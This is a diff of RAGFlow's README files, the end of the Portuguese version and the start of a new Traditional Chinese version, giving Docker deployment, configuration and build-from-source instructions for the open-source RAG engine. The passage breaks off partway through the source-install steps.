> O comando abaixo baixa a edição `v0.20.0-slim` da imagem Docker do RAGFlow. Consulte a tabela a seguir para descrições de diferentes edições do RAGFlow. Para baixar uma edição do RAGFlow diferente da `v0.20.0-slim`, atualize a variável `RAGFLOW_IMAGE` conforme necessário no **docker/.env** antes de usar `docker compose` para iniciar o servidor. Por exemplo: defina `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` para a edição completa `v0.20.0`.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ cd ragflow/docker
|
||||||
|
# Use CPU for embedding and DeepDoc tasks:
|
||||||
|
$ docker compose -f docker-compose.yml up -d
|
||||||
|
|
||||||
|
# To use GPU to accelerate embedding and DeepDoc tasks:
|
||||||
|
# docker compose -f docker-compose-gpu.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
| Tag da imagem RAGFlow | Tamanho da imagem (GB) | Possui modelos de incorporação? | Estável? |
|
||||||
|
| --------------------- | ---------------------- | ------------------------------- | ------------------------ |
|
||||||
|
| v0.20.0 | ~9 | :heavy_check_mark: | Lançamento estável |
|
||||||
|
| v0.20.0-slim | ~2 | ❌ | Lançamento estável |
|
||||||
|
| nightly | ~9 | :heavy_check_mark: | _Instável_ build noturno |
|
||||||
|
| nightly-slim | ~2 | ❌ | _Instável_ build noturno |
|
||||||
|
|
||||||
|
4. Verifique o status do servidor após tê-lo iniciado:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker logs -f ragflow-server
|
||||||
|
```
|
||||||
|
|
||||||
|
_O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
|
||||||
|
|
||||||
|
```bash
|
||||||
|
____ ___ ______ ______ __
|
||||||
|
/ __ \ / | / ____// ____// /____ _ __
|
||||||
|
/ /_/ // /| | / / __ / /_ / // __ \| | /| / /
|
||||||
|
/ _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
|
||||||
|
/_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
|
||||||
|
|
||||||
|
* Running on all addresses (0.0.0.0)
|
||||||
|
```
|
||||||
|
|
||||||
|
> Se você pular essa etapa de confirmação e acessar diretamente o RAGFlow, seu navegador pode exibir um erro `network anormal`, pois, nesse momento, seu RAGFlow pode não estar totalmente inicializado.
|
||||||
|
|
||||||
|
5. No seu navegador, insira o endereço IP do seu servidor e faça login no RAGFlow.
|
||||||
|
|
||||||
|
> Com as configurações padrão, você só precisa digitar `http://IP_DA_SUA_MÁQUINA` (**sem** o número da porta), pois a porta HTTP padrão `80` pode ser omitida ao usar as configurações padrão.
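>
> Por exemplo, para conferir rapidamente se a interface web já responde na porta padrão (um exemplo mínimo, assumindo acesso a partir do próprio servidor):
>
> ```bash
> # Verifica se o serviço HTTP do RAGFlow responde na porta 80
> curl -I http://127.0.0.1
> ```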
|
||||||
|
|
||||||
|
6. Em [service_conf.yaml.template](./docker/service_conf.yaml.template), selecione a fábrica LLM desejada em `user_default_llm` e atualize o campo `API_KEY` com a chave de API correspondente.
|
||||||
|
|
||||||
|
> Consulte [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) para mais informações.
|
||||||
|
|
||||||
|
_O show está no ar!_
|
||||||
|
|
||||||
|
## 🔧 Configurações
|
||||||
|
|
||||||
|
Quando se trata de configurações do sistema, você precisará gerenciar os seguintes arquivos:
|
||||||
|
|
||||||
|
- [.env](./docker/.env): Contém as configurações fundamentais para o sistema, como `SVR_HTTP_PORT`, `MYSQL_PASSWORD` e `MINIO_PASSWORD`.
|
||||||
|
- [service_conf.yaml.template](./docker/service_conf.yaml.template): Configura os serviços de back-end. As variáveis de ambiente neste arquivo serão automaticamente preenchidas quando o contêiner Docker for iniciado. Quaisquer variáveis de ambiente definidas dentro do contêiner Docker estarão disponíveis para uso, permitindo personalizar o comportamento do serviço com base no ambiente de implantação.
|
||||||
|
- [docker-compose.yml](./docker/docker-compose.yml): O sistema depende do [docker-compose.yml](./docker/docker-compose.yml) para iniciar.
|
||||||
|
|
||||||
|
> O arquivo [./docker/README](./docker/README.md) fornece uma descrição detalhada das configurações do ambiente e dos serviços, que podem ser usadas como `${ENV_VARS}` no arquivo [service_conf.yaml.template](./docker/service_conf.yaml.template).
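>
> Por exemplo, é possível listar as variáveis de ambiente referenciadas como `${ENV_VARS}` no template (um comando de inspeção ilustrativo, não um passo obrigatório):
>
> ```bash
> # Lista, sem repetições, as variáveis referenciadas no template
> grep -oE '\$\{[A-Z_]+' docker/service_conf.yaml.template | tr -d '${' | sort -u
> ```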
|
||||||
|
|
||||||
|
Para atualizar a porta HTTP de serviço padrão (80), vá até [docker-compose.yml](./docker/docker-compose.yml) e altere `80:80` para `<SUA_PORTA_DE_SERVIÇO>:80`.
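Por exemplo, para expor o serviço na porta 8080 (a porta 8080 é apenas um exemplo):

```bash
# Troca a porta publicada de 80 para 8080 no docker-compose.yml
sed -i 's/80:80/8080:80/' docker/docker-compose.yml
```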
|
||||||
|
|
||||||
|
Atualizações nas configurações acima exigem um reinício de todos os contêineres para que tenham efeito:
|
||||||
|
|
||||||
|
> ```bash
|
||||||
|
> $ docker compose -f docker-compose.yml up -d
|
||||||
|
> ```
|
||||||
|
|
||||||
|
### Mudar o mecanismo de documentos de Elasticsearch para Infinity
|
||||||
|
|
||||||
|
O RAGFlow usa o Elasticsearch por padrão para armazenar texto completo e vetores. Para mudar para o [Infinity](https://github.com/infiniflow/infinity/), siga estas etapas:
|
||||||
|
|
||||||
|
1. Pare todos os contêineres em execução:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker compose -f docker/docker-compose.yml down -v
|
||||||
|
```
|
||||||
|
Note: `-v` irá deletar os volumes do contêiner, e os dados existentes serão apagados.
|
||||||
|
2. Defina `DOC_ENGINE` no **docker/.env** para `infinity`.
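Um esboço de como fazer isso com `sed` (pode exigir ajuste conforme o formato real do **docker/.env**):

```bash
# Define DOC_ENGINE=infinity no docker/.env
sed -i 's/^DOC_ENGINE=.*/DOC_ENGINE=infinity/' docker/.env
grep "^DOC_ENGINE" docker/.env   # deve exibir DOC_ENGINE=infinity
```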
|
||||||
|
|
||||||
|
3. Inicie os contêineres:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker compose -f docker/docker-compose.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
> [!WARNING]
|
||||||
|
> A mudança para o Infinity em uma máquina Linux/arm64 ainda não é oficialmente suportada.
|
||||||
|
|
||||||
|
## 🔧 Criar uma imagem Docker sem modelos de incorporação
|
||||||
|
|
||||||
|
Esta imagem tem cerca de 2 GB de tamanho e depende de serviços externos de LLM e incorporação.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
|
||||||
|
```
|
||||||
|
|
||||||
|
## 🔧 Criar uma imagem Docker incluindo modelos de incorporação
|
||||||
|
|
||||||
|
Esta imagem tem cerca de 9 GB de tamanho. Como inclui modelos de incorporação, depende apenas de serviços externos de LLM.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
|
||||||
|
```
|
||||||
|
|
||||||
|
## 🔨 Lançar o serviço a partir do código-fonte para desenvolvimento
|
||||||
|
|
||||||
|
1. Instale o `uv`, ou pule esta etapa se ele já estiver instalado:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pipx install uv pre-commit
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Clone o código-fonte e instale as dependências Python:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
uv sync --python 3.10 --all-extras # instala os módulos Python dependentes do RAGFlow
|
||||||
|
uv run download_deps.py
|
||||||
|
pre-commit install
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Inicie os serviços dependentes (MinIO, Elasticsearch, Redis e MySQL) usando Docker Compose:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
docker compose -f docker/docker-compose-base.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
Adicione a seguinte linha ao arquivo `/etc/hosts` para resolver todos os hosts especificados em **docker/.env** para `127.0.0.1`:
|
||||||
|
|
||||||
|
```
|
||||||
|
127.0.0.1 es01 infinity mysql minio redis sandbox-executor-manager
|
||||||
|
```
|
||||||
|
|
||||||
|
4. Se não conseguir acessar o HuggingFace, defina a variável de ambiente `HF_ENDPOINT` para usar um site espelho:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
export HF_ENDPOINT=https://hf-mirror.com
|
||||||
|
```
|
||||||
|
|
||||||
|
5. Se o seu sistema operacional não tiver jemalloc, instale-o da seguinte maneira:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# ubuntu
|
||||||
|
sudo apt-get install libjemalloc-dev
|
||||||
|
# centos
|
||||||
|
sudo yum install jemalloc
|
||||||
|
```
|
||||||
|
|
||||||
|
6. Lance o serviço de back-end:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
source .venv/bin/activate
|
||||||
|
export PYTHONPATH=$(pwd)
|
||||||
|
bash docker/launch_backend_service.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
7. Instale as dependências do front-end:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cd web
|
||||||
|
npm install
|
||||||
|
```
|
||||||
|
|
||||||
|
8. Lance o serviço de front-end:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
npm run dev
|
||||||
|
```
|
||||||
|
|
||||||
|
_O seguinte resultado confirma o lançamento bem-sucedido do sistema:_
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
9. Pare os serviços de front-end e back-end do RAGFlow após a conclusão do desenvolvimento:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pkill -f "ragflow_server.py|task_executor.py"
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## 📚 Documentação
|
||||||
|
|
||||||
|
- [Quickstart](https://ragflow.io/docs/dev/)
|
||||||
|
- [Configuration](https://ragflow.io/docs/dev/configurations)
|
||||||
|
- [Release notes](https://ragflow.io/docs/dev/release_notes)
|
||||||
|
- [User guides](https://ragflow.io/docs/dev/category/guides)
|
||||||
|
- [Developer guides](https://ragflow.io/docs/dev/category/developers)
|
||||||
|
- [References](https://ragflow.io/docs/dev/category/references)
|
||||||
|
- [FAQs](https://ragflow.io/docs/dev/faq)
|
||||||
|
|
||||||
|
## 📜 Roadmap
|
||||||
|
|
||||||
|
Veja o [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214)
|
||||||
|
|
||||||
|
## 🏄 Comunidade
|
||||||
|
|
||||||
|
- [Discord](https://discord.gg/NjYzJD3GM3)
|
||||||
|
- [Twitter](https://twitter.com/infiniflowai)
|
||||||
|
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
|
||||||
|
|
||||||
|
## 🙌 Contribuindo
|
||||||
|
|
||||||
|
O RAGFlow prospera por meio da colaboração de código aberto. Com esse espírito, abraçamos contribuições diversas da comunidade.
|
||||||
|
Se você deseja fazer parte, primeiro revise nossas [Diretrizes de Contribuição](https://ragflow.io/docs/dev/contributing).
|
||||||
README_tzh.md (new file)
@@ -0,0 +1,413 @@
|
|||||||
|
<div align="center">
|
||||||
|
<a href="https://demo.ragflow.io/">
|
||||||
|
<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
|
||||||
|
</a>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<p align="center">
|
||||||
|
<a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
|
||||||
|
<a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
|
||||||
|
<a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DBEDFA"></a>
|
||||||
|
<a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
|
||||||
|
<a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
|
||||||
|
<a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
|
||||||
|
<a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<p align="center">
|
||||||
|
<a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
|
||||||
|
<img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
|
||||||
|
</a>
|
||||||
|
<a href="https://demo.ragflow.io" target="_blank">
|
||||||
|
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
|
||||||
|
</a>
|
||||||
|
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||||
|
<img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
|
||||||
|
</a>
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||||
|
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||||
|
</a>
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||||
|
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||||
|
</a>
|
||||||
|
<a href="https://deepwiki.com/infiniflow/ragflow">
|
||||||
|
<img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
|
||||||
|
</a>
|
||||||
|
</p>
|
||||||
|
|
||||||
|
<h4 align="center">
|
||||||
|
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
|
||||||
|
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||||
|
<a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
|
||||||
|
<a href="https://demo.ragflow.io">Demo</a>
|
||||||
|
</h4>
|
||||||
|
|
||||||
|
#
|
||||||
|
|
||||||
|
<div align="center">
|
||||||
|
<a href="https://trendshift.io/repositories/9064" target="_blank"><img src="https://trendshift.io/api/badge/repositories/9064" alt="infiniflow%2Fragflow | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/></a>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<details open>
|
||||||
|
<summary><b>📕 目錄</b></summary>
|
||||||
|
|
||||||
|
- 💡 [RAGFlow 是什麼?](#-RAGFlow-是什麼)
|
||||||
|
- 🎮 [Demo-試用](#-demo-試用)
|
||||||
|
- 📌 [近期更新](#-近期更新)
|
||||||
|
- 🌟 [主要功能](#-主要功能)
|
||||||
|
- 🔎 [系統架構](#-系統架構)
|
||||||
|
- 🎬 [快速開始](#-快速開始)
|
||||||
|
- 🔧 [系統配置](#-系統配置)
|
||||||
|
- 🔨 [以原始碼啟動服務](#-以原始碼啟動服務)
|
||||||
|
- 📚 [技術文檔](#-技術文檔)
|
||||||
|
- 📜 [路線圖](#-路線圖)
|
||||||
|
- 🏄 [貢獻指南](#-貢獻指南)
|
||||||
|
- 🙌 [加入社區](#-加入社區)
|
||||||
|
- 🤝 [商務合作](#-商務合作)
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## 💡 RAGFlow 是什麼?
|
||||||
|
|
||||||
|
[RAGFlow](https://ragflow.io/) 是一款基於深度文件理解所建構的開源 RAG(Retrieval-Augmented Generation)引擎。 RAGFlow 可以為各種規模的企業及個人提供一套精簡的 RAG 工作流程,結合大語言模型(LLM)針對用戶各類不同的複雜格式數據提供可靠的問答以及有理有據的引用。
|
||||||
|
|
||||||
|
## 🎮 Demo 試用
|
||||||
|
|
||||||
|
請登入網址 [https://demo.ragflow.io](https://demo.ragflow.io) 試用 demo。
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
|
||||||
|
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🔥 近期更新
|
||||||
|
|
||||||
|
- 2025-08-01 支援 agentic workflow
|
||||||
|
- 2025-05-23 為 Agent 新增 Python/JS 程式碼執行器元件。
|
||||||
|
- 2025-05-05 支援跨語言查詢。
|
||||||
|
- 2025-03-19 PDF 和 DOCX 中的圖片支援用多模態大模型解析以取得描述。
|
||||||
|
- 2025-02-28 結合網路搜尋(Tavily),對於任意大模型實現類似 Deep Research 的推理功能。
|
||||||
|
- 2024-12-18 升級了 DeepDoc 的文檔佈局分析模型。
|
||||||
|
- 2024-08-22 支援用 RAG 技術實現從自然語言到 SQL 語句的轉換。
|
||||||
|
|
||||||
|
## 🎉 關注項目
|
||||||
|
|
||||||
|
⭐️ 點擊右上角的 Star 追蹤 RAGFlow,可以取得最新發布的即時通知 !🌟
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🌟 主要功能
|
||||||
|
|
||||||
|
### 🍭 **"Quality in, quality out"**
|
||||||
|
|
||||||
|
- 基於[深度文件理解](./deepdoc/README.md),能夠從各類複雜格式的非結構化資料中提取真知灼見。
|
||||||
|
- 真正在無限上下文(token)的場景下快速完成大海撈針測試。
|
||||||
|
|
||||||
|
### 🍱 **基於模板的文字切片**
|
||||||
|
|
||||||
|
- 不只是智能,更重要的是可控可解釋。
|
||||||
|
- 多種文字範本可供選擇
|
||||||
|
|
||||||
|
### 🌱 **有理有據、最大程度降低幻覺(hallucination)**
|
||||||
|
|
||||||
|
- 文字切片過程視覺化,支援手動調整。
|
||||||
|
- 有理有據:答案提供關鍵引用的快照並支持追根溯源。
|
||||||
|
|
||||||
|
### 🍔 **相容各類異質資料來源**
|
||||||
|
|
||||||
|
- 支援豐富的文件類型,包括 Word 文件、PPT、excel 表格、txt 檔案、圖片、PDF、影印件、複印件、結構化資料、網頁等。
|
||||||
|
|
||||||
|
### 🛀 **全程無憂、自動化的 RAG 工作流程**
|
||||||
|
|
||||||
|
- 全面優化的 RAG 工作流程可以支援從個人應用乃至超大型企業的各類生態系統。
|
||||||
|
- 大語言模型 LLM 以及向量模型皆支援配置。
|
||||||
|
- 基於多路召回、融合重排序。
|
||||||
|
- 提供易用的 API,可輕鬆整合到各類企業系統。
|
||||||
|
|
||||||
|
## 🔎 系統架構
|
||||||
|
|
||||||
|
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||||
|
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
## 🎬 快速開始
|
||||||
|
|
||||||
|
### 📝 前提條件
|
||||||
|
|
||||||
|
- CPU >= 4 核
|
||||||
|
- RAM >= 16 GB
|
||||||
|
- Disk >= 50 GB
|
||||||
|
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||||
|
- [gVisor](https://gvisor.dev/docs/user_guide/install/): 僅在您打算使用 RAGFlow 的代碼執行器(沙箱)功能時才需要安裝。
|
||||||
|
|
||||||
|
> [!TIP]
|
||||||
|
> 如果你並沒有在本機安裝 Docker(Windows、Mac,或 Linux), 可以參考文件 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安裝。
|
||||||
|
|
||||||
|
### 🚀 啟動伺服器
|
||||||
|
|
||||||
|
1. 確保 `vm.max_map_count` 不小於 262144:
|
||||||
|
|
||||||
|
> 如需確認 `vm.max_map_count` 的大小:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> $ sysctl vm.max_map_count
|
||||||
|
> ```
|
||||||
|
>
|
||||||
|
> 如果 `vm.max_map_count` 的值小於 262144,可以進行重設:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> # 這裡我們設為 262144:
|
||||||
|
> $ sudo sysctl -w vm.max_map_count=262144
|
||||||
|
> ```
|
||||||
|
>
|
||||||
|
> 你的改動會在下次系統重新啟動時被重置。如果希望做永久改動,還需要在 **/etc/sysctl.conf** 檔案裡把 `vm.max_map_count` 的值再相應更新一遍:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> vm.max_map_count=262144
|
||||||
|
> ```
|
||||||
|
|
||||||
|
2. 克隆倉庫:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
```
|
||||||
|
|
||||||
|
3. 進入 **docker** 資料夾,利用事先編譯好的 Docker 映像啟動伺服器:
|
||||||
|
|
||||||
|
> [!CAUTION]
|
||||||
|
> 所有 Docker 映像檔都是為 x86 平台建置的。目前,我們不提供 ARM64 平台的 Docker 映像檔。
|
||||||
|
> 如果您使用的是 ARM64 平台,請使用 [這份指南](https://ragflow.io/docs/dev/build_docker_image) 來建置適合您系統的 Docker 映像檔。
|
||||||
|
|
||||||
|
> 執行以下指令會自動下載 RAGFlow slim Docker 映像 `v0.20.0-slim`。請參考下表查看不同 Docker 發行版的說明。如需下載不同於 `v0.20.0-slim` 的 Docker 映像,請在執行 `docker compose` 啟動服務之前先更新 **docker/.env** 檔案內的 `RAGFLOW_IMAGE` 變數。例如,你可以透過設定 `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` 來下載 RAGFlow 鏡像的 `v0.20.0` 完整發行版。
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ cd ragflow/docker
|
||||||
|
# Use CPU for embedding and DeepDoc tasks:
|
||||||
|
$ docker compose -f docker-compose.yml up -d
|
||||||
|
|
||||||
|
# To use GPU to accelerate embedding and DeepDoc tasks:
|
||||||
|
# docker compose -f docker-compose-gpu.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
|
||||||
|
| ----------------- | --------------- | --------------------- | ------------------------ |
|
||||||
|
| v0.20.0 | ≈9 | :heavy_check_mark: | Stable release |
|
||||||
|
| v0.20.0-slim | ≈2 | ❌ | Stable release |
|
||||||
|
| nightly | ≈9 | :heavy_check_mark: | _Unstable_ nightly build |
|
||||||
|
| nightly-slim | ≈2 | ❌ | _Unstable_ nightly build |
|
||||||
|
|
||||||
|
> [!TIP]
|
||||||
|
> 如果你遇到 Docker 映像檔拉不下來的問題,可以在 **docker/.env** 檔案內根據變數 `RAGFLOW_IMAGE` 的註解提示選擇華為雲或阿里雲的對應映像。
|
||||||
|
>
|
||||||
|
> - 華為雲鏡像名:`swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow`
|
||||||
|
> - 阿里雲鏡像名:`registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow`
|
||||||
|
|
||||||
|
4. 伺服器啟動成功後再次確認伺服器狀態:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker logs -f ragflow-server
|
||||||
|
```
|
||||||
|
|
||||||
|
_出現以下介面提示說明伺服器啟動成功:_
|
||||||
|
|
||||||
|
```bash
|
||||||
|
____ ___ ______ ______ __
|
||||||
|
/ __ \ / | / ____// ____// /____ _ __
|
||||||
|
/ /_/ // /| | / / __ / /_ / // __ \| | /| / /
|
||||||
|
/ _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
|
||||||
|
/_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
|
||||||
|
|
||||||
|
* Running on all addresses (0.0.0.0)
|
||||||
|
```
|
||||||
|
|
||||||
|
> 如果您跳過這一步驟系統確認步驟就登入 RAGFlow,你的瀏覽器有可能會提示 `network anormal` 或 `網路異常`,因為 RAGFlow 可能並未完全啟動成功。
|
||||||
|
|
||||||
|
5. 在你的瀏覽器中輸入你的伺服器對應的 IP 位址並登入 RAGFlow。
|
||||||
|
> 上面這個範例中,您只需輸入 http://IP_OF_YOUR_MACHINE 即可:未改動過設定則無需輸入連接埠(預設的 HTTP 服務連接埠 80)。
|
||||||
|
6. 在 [service_conf.yaml.template](./docker/service_conf.yaml.template) 檔案的 `user_default_llm` 欄位設定 LLM factory,並在 `API_KEY` 欄填入和你選擇的大模型相對應的 API key。
|
||||||
|
|
||||||
|
> 詳見 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
|
||||||
|
|
||||||
|
_好戲開始,接著奏樂接著舞!_
|
||||||
|
|
||||||
|
## 🔧 系統配置
|
||||||
|
|
||||||
|
系統配置涉及以下三份文件:
|
||||||
|
|
||||||
|
- [.env](./docker/.env):存放一些系統環境變量,例如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
|
||||||
|
- [service_conf.yaml.template](./docker/service_conf.yaml.template):設定各類別後台服務。
|
||||||
|
- [docker-compose.yml](./docker/docker-compose.yml): 系統依賴該檔案完成啟動。
|
||||||
|
|
||||||
|
請務必確保 [.env](./docker/.env) 檔案中的變數設定與 [service_conf.yaml.template](./docker/service_conf.yaml.template) 檔案中的設定保持一致!
|
||||||
|
|
||||||
|
如果無法存取映像網站 hub.docker.com 或模型網站 huggingface.co,請依照 [.env](./docker/.env) 註解修改 `RAGFLOW_IMAGE` 和 `HF_ENDPOINT`。
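舉例來說,可以改用上文提到的阿里雲鏡像,並把 `HF_ENDPOINT` 指向鏡像站(以下僅為一種寫法示例,實際請以 [.env](./docker/.env) 內的註解為準):

```bash
# 一例:在 docker/.env 中改用阿里雲鏡像來源
sed -i 's#^RAGFLOW_IMAGE=.*#RAGFLOW_IMAGE=registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow:v0.20.0#' docker/.env
# 並將 HuggingFace 端點指向鏡像站
export HF_ENDPOINT=https://hf-mirror.com
```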
|
||||||
|
|
||||||
|
> [./docker/README](./docker/README.md) 解釋了 [service_conf.yaml.template](./docker/service_conf.yaml.template) 用到的環境變數設定和服務配置。
|
||||||
|
|
||||||
|
如需更新預設的 HTTP 服務連接埠(80), 可以在[docker-compose.yml](./docker/docker-compose.yml) 檔案中將配置`80:80` 改為`<YOUR_SERVING_PORT>:80` 。
|
||||||
|
|
||||||
|
> 所有系統配置都需要透過系統重新啟動生效:
|
||||||
|
>
|
||||||
|
> ```bash
|
||||||
|
> $ docker compose -f docker-compose.yml up -d
|
||||||
|
> ```
|
||||||
|
|
||||||
|
### 把文檔引擎從 Elasticsearch 切換為 Infinity
|
||||||
|
|
||||||
|
RAGFlow 預設使用 Elasticsearch 儲存文字和向量資料. 如果要切換為 [Infinity](https://github.com/infiniflow/infinity/), 可以按照下面步驟進行:
|
||||||
|
|
||||||
|
1. 停止所有容器運作:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker compose -f docker/docker-compose.yml down -v
|
||||||
|
```
|
||||||
|
Note: `-v` 將會刪除 docker 容器的 volumes,已有的資料會被清空。
|
||||||
|
|
||||||
|
2. 將 **docker/.env** 檔案中的 `DOC_ENGINE` 設定為 `infinity`。
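以下是用 `sed` 修改的一種寫法示例(實際請依 **docker/.env** 的內容調整):

```bash
# 將 docker/.env 中的 DOC_ENGINE 改為 infinity
sed -i 's/^DOC_ENGINE=.*/DOC_ENGINE=infinity/' docker/.env
grep "^DOC_ENGINE" docker/.env   # 顯示 DOC_ENGINE=infinity 即表示成功
```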
|
||||||
|
|
||||||
|
3. 啟動容器:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ docker compose -f docker/docker-compose.yml up -d
|
||||||
|
```
|
||||||
|
|
||||||
|
> [!WARNING]
|
||||||
|
> Infinity 目前官方並未正式支援在 Linux/arm64 架構下的機器上運行.
|
||||||
|
|
||||||
|
## 🔧 原始碼編譯 Docker 映像(不含 embedding 模型)
|
||||||
|
|
||||||
|
本 Docker 映像大小約 2 GB 左右並且依賴外部的大模型和 embedding 服務。
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
docker build --platform linux/amd64 --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
|
||||||
|
```
|
||||||
|
|
||||||
|
## 🔧 原始碼編譯 Docker 映像(包含 embedding 模型)
|
||||||
|
|
||||||
|
本 Docker 大小約 9 GB 左右。由於已包含 embedding 模型,所以只需依賴外部的大模型服務即可。
|
||||||
|
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/infiniflow/ragflow.git
|
||||||
|
cd ragflow/
|
||||||
|
docker build --platform linux/amd64 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
|
||||||
|
```
|
||||||
|
|
||||||
|
## 🔨 以原始碼啟動服務
|
||||||
|
|
||||||
|
1. 安裝 uv。如已安裝,可跳過此步驟:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pipx install uv pre-commit
|
||||||
|
export UV_INDEX=https://mirrors.aliyun.com/pypi/simple
|
||||||
|
```
|
||||||
|
|
||||||
|
2. 下載原始碼並安裝 Python 依賴:
|
||||||
|
|
||||||
|
